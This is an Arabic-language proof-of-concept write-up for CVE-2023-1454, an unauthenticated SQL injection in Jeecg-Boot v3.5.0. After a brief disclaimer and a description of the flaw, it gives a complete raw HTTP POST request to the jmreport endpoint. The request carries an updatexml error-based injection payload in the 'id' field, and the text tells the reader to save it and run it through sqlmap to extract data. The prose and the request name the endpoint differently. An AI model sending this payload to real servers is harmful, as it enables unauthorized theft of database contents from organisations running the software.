
CVE-2023-1454 نص اكتشاف الثغرات
نص برمجي للكشف عن الثغرة CVE-2023-1454
هذا المستند لأغراض مرجعية فقط، يُرجى عدم استخدام المواد التقنية والأدوات الواردة فيه لاختراق أي نظام حاسوبي دون إذن. أي عواقب أو خسائر مباشرة أو غير مباشرة ناتجة عن استخدام المعلومات المقدمة هنا تقع على عاتق المستخدم وحده.
مقدمة Jeecg-Boot هي منصة تطوير منخفضة الكود تعتمد على مولد الأكواد، وتوفر مجموعة من مولدات الأكواد ومحركات القوالب وإدارة الصلاحيات وقواميس البيانات ووظائف استيراد وتصدير البيانات وغيرها، مما يساعد المطورين على بناء تطبيقات المؤسسات بسرعة.
نظرة عامة على الثغرة منصة Java منخفضة الكود لتطبيقات الويب المؤسسية Jeecg-Boot (الإصدار v3.5.0) تستخدم jimureport-spring-boot-starter-1.5.6.jar، وهناك خلل في فلترة الأحرف الخاصة في Jeecg-Boot. في ظل وجود الواجهة الأمامية Vue3 في الإصدار v3.5.0، يوجد في Jeecg ثغرة حقن SQL غير مصرح بها، وتقع نقطة الثغرة في المسار /querySql حيث يتم استدعاء SQL دون معالجة في id، مما يسمح بحقن الإخطار المباشر، ويمكن للمهاجم غير الموثّق عن بُعد، عن طريق إنشاء سلاسل خاصة، الحصول على معلومات حساسة من قاعدة البيانات الهدف.
الإصدارات المتأثرة الإصدار المتأثر: Jeecg-Boot = v3.5.0
احفظ حزمة البيانات كملف txt ويمكن استخدام sqlmap للحصول على البيانات
POST /jmreport/qurestSql HTTP/1.1
Host: xxx.xxx.xxx
Content-Length: 0
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}